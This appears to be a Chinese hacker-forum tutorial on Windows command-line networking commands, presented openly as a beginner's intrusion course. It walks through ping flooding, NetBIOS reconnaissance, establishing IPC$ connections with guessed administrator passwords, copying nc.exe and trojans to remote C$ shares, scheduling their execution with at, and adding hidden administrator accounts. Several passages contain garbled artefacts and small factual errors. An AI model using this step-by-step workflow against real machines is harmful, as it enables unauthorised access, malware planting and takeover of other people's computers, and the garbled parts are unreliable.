常用DOS命令讲解

Tasklist查看任务管理器 Tasklist /？帮助
MOVE 将文件从一个目录移到另一个目录。
COPY 将至少一个文件复制到另一个位置。
XCOPY 复制文件和目录树。
CLS 清除屏幕。
ATTRIB 显示或更改文件属性。
DIR 显示一个目录中的文件和子目录。
EXIT 退出 CMD.EXE 程序(命令解释程序)
FINDSTR 在文件中搜索字符串。
FORMAT 格式化磁盘，以便跟 Windows 使用。
FTYPE 显示或修改用于文件扩展名关联的文件类型。
MD 创建目录。
RD 删除目录。
DEL 删除至少一个文件。
REN 重命名文件。
REPLACE 替换文件
TYPE 显示文本文件的内容。
msconfig---------系统配置实用程序
notepad--------打开记事本
regedit----------注册表编辑器
taskmgr-----任务管理器（适用于2000／xp／2003）
write----------写字板
mem.exe--------显示内存使用情况
drwtsn32------ 系统医生
gpedit.msc-----组策略
logoff---------注销命令
Clipbrd--------剪贴板查看器
ntbackup-------系统备份和还原
write----------写字板
mem.exe--------显示内存使用情况
explorer-------打开资源管理器
EXCEL--------EXCEL工作表

 

  

  

一，ping
   它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说

，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地

址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可

以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看

看帮助吧，在DOS窗口中键入：ping /? 回车，出现如图1。所示的帮助画面。在此，我们只掌握一些基本

的很有用的参数就可以了（下同）。

-t  表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目

标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这

么简单的实现了。

-l  定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t

参数一起使用，会有更好的效果哦。
          
-n  定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时

间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。

   说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如“ping IP

-t -n 3”，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得

ping IP，也可以直接ping主机域名，这样就可以得到主机的IP。

下面我们举个例子来说明一下具体用法。

time<10ms表示从发出数据包到接受到返回数据包所用的时间是10秒，从这里可以判断网络连接速度的大

小 。从TTL的返回值可以初步判断被ping主机的操作系统，之所以说“初步判断”是因为这个值是可以修

改的。这里TTL=128表示操作win2000
（小知识：如果TTL=128，则表示目标主机可能是Win2000；如果TTL=250，则目标主机可能是Unix）
至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可以对别人进行ping攻击…

…这些就靠大家自己发挥了。

二，nbtstat

   该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用这个命令你可以得到远程主机的

NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。

-a    使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS信息。

-A    这个参数也可以得到远程主机的NETBIOS信息，但需要你知道它的IP。
-n    列出本地机器的NETBIOS信息。

   当得到了对方的IP或者机器名的时候，就可以使用nbtstat命令来进一步得到对方的信息了，这又增加

了我们入侵的保险系数。

三，netstat
   这是一个用来查看网络状态的命令，操作简便功能强大。

-a    查看本地机器的所有开放端口，可以有效发现和预防木马，可以知道机器所开的服务等信息。

这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法：netsta* -* **。
-r    列出当前的路由信息，告诉我们本地机器的网关、子网掩码等信息。用法：netstat -r IP。

四，tracert
   跟踪路由信息，使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径，这对我们了

解网络布局和结构很有帮助。

这里说明数据从本地机器传输到192.168.0.1的机器上，中间没有经过任何中转，说明这两台机器是在同

一段局域网内。用法：tracert IP。
五，net

   这个命令是网络命令中最重要的一个，必须透彻掌握它的每一个子命令的用法，因为它的功能实在是

太强大了，这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令，键入

net /?回车。

在这里，我们重点掌握几个入侵常用的子命令。

net view

   使用此命令查看远程主机的所以共享资源。命令格式为net view //IP 。

我内网机器共享资源是空的。

net use
   把远程主机的某个共享资源影射为本地盘符，图形界面方便使用，呵呵。命令格式为net u** *:

//IP/sharename。表示把对方电脑的共享的目录影射为本地的X盘。下面表示和对方电脑建立IPC$连接

（net use //IP/IPC$ "password" /user:（"username"），

D:/Hacker/Ms溢出>net use //192.168.1.4/ipc$ 5519614 /user:administrator
命令成功完成。

建立了IPC$连接后，呵呵，就可以上传文件了：
copy nc.exe //192.168.1.4/C$，表示把本地目录下的nc.exe传到远程主机，结合后面要介绍到的其他

DOS命令就可以实现入侵了。这里我们也可以传嗰马。

net start
   使用它来启动远程主机上的服务。当你和远程主机建立连接后，如果发现它的什么服务没有启动，而

你又想利用此服务怎么办？就使用这个命令来启动吧。用法：net start servername 。

net stop
   入侵后发现远程主机的某个服务碍手碍脚，怎么办？利用这个命令停掉就ok了，用法和net start同。

net user
   查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我

们入侵是很有利的，最重要的，它为我们克隆帐户提供了前提。键入不带参数的net user，可以查看所有

用户，包括已经禁用的。下面分别讲解。
1，net user abcd 1234 /add，新建一个用户名为abcd，密码为1234的帐户，默认为user组成员。
2，net user abcd /del，将用户名为abcd的用户删除。
3，net user abcd /active:no，将用户名为abcd的用户禁用。
4，net user abcd /active:yes，激活用户名为abcd的用户。
5，net user abcd，查看用户名为abcd的用户的情况 。

net localgroup
   查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用

户组。在入侵过程中，我们一般利用它来把某个帐户提升为administrator组帐户，这样我们利用这个帐

户就可以控制整个远程主机了。用法：net localgroup groupname username /add，

   现在我们把刚才新建的用户abcd加到administrator组里去了，这时候abcd用户已经是超级管理员了，

呵呵，你可以再使用net user abcd来查看他的状态，但这样太明显了，网管一看用户情况就能漏出破绽

，所以这种方法只能对付菜鸟网管，但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网

管看不出来的超级管理员，这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆

帐户》一文。

net time
   这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面，那么也许就用不到

这个命令了。但简单的入侵成功了，难道只是看看吗？我们需要进一步渗透。这就连远程主机当前的时间

都需要知道，因为利用时间和其他手段（后面会讲到）可以实现某个命令和程序的定时启动，为我们进一

步入侵打好基础。用法：net time //IP。

六，at

   这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序（知道net time的重要了吧？）

。当我们知道了远程主机的当前时间，就可以利用此命令让其在以后的某个时间（比如2分钟后）执行某

个程序和命令。用法：at time command //computer。

D:/Hacker/Ms溢出>at //192.168.1.4 23:18 c:/cmd.txt
这里表示在23点18分在192.168.1.4机器上运行C盘的cmd.txt文件。
这里也可以配合上面说过的copy文件那来一起使用，先传马再用at命令。

七，ftp

   大家对这个命令应该比较熟悉了吧？网络上开放的ftp的主机很多，其中很大一部分是匿名的，也就是

说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机（一般都是开了21端口的机器），

如果你还不会使用ftp的命令怎么办？下面就给出基本的ftp命令使用方法。
首先在命令行键入ftp回车，出现ftp的提示符，这时候可以键入“help”来查看帮助（任何DOS命令都可

以使用此方法查看其帮助），

大家可能看到了，这么多命令该怎么用？其实也用不到那么多，掌握几个基本的就够了。

   首先是登陆过程，这就要用到open了，直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可

，一般端口默认都是21，可以不写。接着就是输入合法的用户名和密码进行登陆了，这里以匿名ftp为例

介绍，

用户名和密码都是ftp，密码是不显示的。当提示**** logged in时，就说明登陆成功。这里因为是匿名

登陆，所以用户显示为Anonymous。

 我内网的机器没搞这服务，所以连不上。

接下来就要介绍具体命令的使用方法了，

dir     跟DOS命令一样，用于查看服务器的文件，直接敲上dir回车，就可以看到此ftp服务器上的文件

。
cd      进入某个文件夹。
get     下载文件到本地机器。
put     上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了，如果可以，呵呵，

该怎么         利用就不多说了，大家就自由发挥去吧。
delete  删除远程ftp服务器上的文件。这也必须保证你有可写的权限。
bye     退出当前连接。
quit    同上。

八，telnet
   功能强大的远程登陆命令，几乎所有的入侵者都喜欢用它，屡试不爽。为什么？它操作简单，如同使

用自己的机器一样，只要你熟悉DOS命令，在成功以administrator身份连接了远程机器后，就可以用它来

干你想干的一切了。下面介绍一下使用方法，首先键入telnet回车，再键入help查看其帮助信息，

   然后在提示符下键入open IP回车，这时就出现了登陆窗口，让你输入合法的用户名和密码，这里输入

任何密码都是不显示的，

我内网的机器没开telnet服务，呵呵。

   当输入用户名和密码都正确后就成功建立了telnet连接，这时候你就在远程主机上具有了和此用户一

样的权限，利用DOS命令就可以实现你想干的事情了。

  这些基本上都是入侵时常用的DOS网络，希望大家能好好的掌握，这对以后的入侵很有帮助的，好了。

这节课就上到这里吧。

                                 菜黑同盟
                         http://www.hackcai.com
 
                                  冰火亮 

第一节
菜鸟必学的网络命令
要学习网络入侵，首先我们必须学习一些基础的网络命令，我们所谓的基础命令其实也就是WIN 2K，WIN

XP系统下的一些DOS命令，这个命令都又CMD.exe来完成
概念部分：
（1）2000、XP下的CMD与98的MS-DOS的不同之处：
cmd.exe叫命令提示符他与98下的MS-DOS是不一样的，所以我们不能将他混为一谈，但是我们却可以用

CMD.exe来执行很多DOS命令，例如：dir、cd、del等等！
（2）CMD下的内部命令与外部命令的不同：
CMD下的内部命令就是指：我们可以直接在CMD下就可以执行的命令，例如：telnet、ftp、dir、cd、等等

，你可以在CMD下输入help进行查看,外部命令呢，就是cmd下不能直接运行的命令，（例如大家常用的nc

）他需要在CMD下切换到他（NC）做在的目录你才能运行NC及NC的命令
实操部分：
(一)：常用入侵防护命令：
Net 、telnet 、at、copy、ftp、finger、del~~~~~~

一些常用的Net命令与例子：
（1）建立IPC连接的命令
Net use //IP/ipc$ “” /user:username
例如：
Net use //127.0.0.1/ipc$ 123456 /user :administrator
这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接
(2) 删除IPC$空连接
Net use //ip /del
例如：
Net use //127.0.0.1 /del
删除与主机127.0.0.1已经建立的Ipc$连接
(3) 启动关闭服务：
Net start                 //查看已经开启的服务
Net start servername
Net stop servername
例如：
Net start telnet             //开启telnet服务
Net stop telnet             //关闭telnet服务
(4)启动关闭共享
Net shate ipc$Content$nbsp;             //开启ipc$默认共享
Net share ipc$ /del           //关闭ipc$默认共享
Net share c=c:/             //完全共享c盘
Net share d=d:/             //删除完全共享的d盘
(4) 映射硬盘
Net use z: //ip/c$
例如：
Net use z: //127.0.0.1/c$Content$nbsp;       //把127.0.0.1的C盘映射成本机的z盘
说明：映射成功后，你在我的电脑里面里面就会多出一个硬盘Z，其实Z就是127.0.0.1的C盘！
Net use z: /del             //断开映射
入侵中的作用：把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了
成功实现的条件：必须与对方建立ipc$连接
(5) 远程复制文件_Copy
Copy e:/3389.exe //127.0.0.1/c$Content$nbsp; //将本地的E盘下的3389.exe这个文件copy到对方系统

的C盘根目录下
  Copy在入侵中的作用：把本地文件复制到对方硬盘
Copy复制成功所需的条件：必须与主机建立ipc$连接
(6) 查看远程系统的时间
  Net time //IP
  Net time //127.0.0.1           //查看远程主机127.0.0.1的本地时间
  作用：得到对方时间好为自己计划任务种下木马做准备
(7) 远程运行程序
  At //ip time server.exe
  At //127.0.0.1 12:30 c:/server.exe     //让主机在中午12:30分运行我们已经复制到他C
盘根目录下的木马server.exe
在入侵中作用：这样我们就可以用我们的木马服务端来连接我们木马，，更好的使用图形方式来控制肉鸡
（8）添加管理员帐号：
  Net user username 1234 /add           //添加一个密码为1234名字为 username的用户
  Net localgroup administrators juntuan /add   //把username这个用户添加到管 理员组
  注意：有些系统的管理员组不是administrators你要根据实际情况来改，不过99.9%的系统的管理员组

还是administrators的。
  修改用户密码：
  Net user username 1234               //把用户username的密码修改成1233。
（9）远程登陆主机_telnet
  telnet IP port
  例如：telnet 127.0.0.1 1234         //连接登陆127.0.0.1的1234端口
  （当目标主机的端口是默认的23的时候我们不需要+端口即：telnet IP 就好）
（10）传输文件命令_ftp
    其实这个我个人觉得用途不大，毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图

形截面的交互如何不好呢？
    首先在CMD里面输入ftp
    然后输入：open IP port
    例如：open 127.0.0.1 1234         //连接登陆127.0.0.1的1234端口
    如何开启windows系统自带的ftp服务：
    Net start msftppsvc
(11)     查看文件夹的属性_cacls
Cacls xiaod           //查看xiaod这个文件夹的属性
    参数说明：F：（完全控制）R：（只读）C：（允许更改）W：（允许写入）N：（没有任何权限）
(12)     删除文件_del
Del是用来删除文件命令
    首先进入你想删除的文件的目录
    Del xiaod.txt             //删除xiaod.txt这个个文件
    Del xiaod.txt /f   //强制删除xiaod.txt这个个文件（当该文件无法正常删除的时候使用该命令）
(13) finger命令
  Finger是一个信息刺探命令一般在对方开启了79端口时命令使用
  Finger –l user @computer
  参数详解： -l 用长列表格式显示消息
          User:指定用户的信息
  成功实现的条件：对方必须安装tcp/ip协议
(14)：文件写入命令_echo:
Echo 你好 > index.htm     //用你好来覆盖index.htm的内容
Echo 你好 >>index.htm   //将“你好”添加到index.htm
（15）：写入注册表文件_regedit
    Regedit /s filename.reg       //s是写入参数
(16)：端口映射_chgport
  Chgport 3=5   //将端口3映射到5
  Chgport /d*   //删除所有端口映射
(17)：文件映射_subst
  Subst b:/ c:/winnt   //这个时候当你访问硬盘B的时候你就是访问了 c:/winnt目录
(18)：查看当前正在使用的帐号：
  Query session   //查看帐号
(19)：踢掉指定用：
  Logoff id       //注意ID，是在用query session查看到的用户的id而不是用户名。
(20)：发送消息给某用户或者内网主机
    Net send hostname or /IP message
    例如：net send xiaod or /127.0.0.1 hello!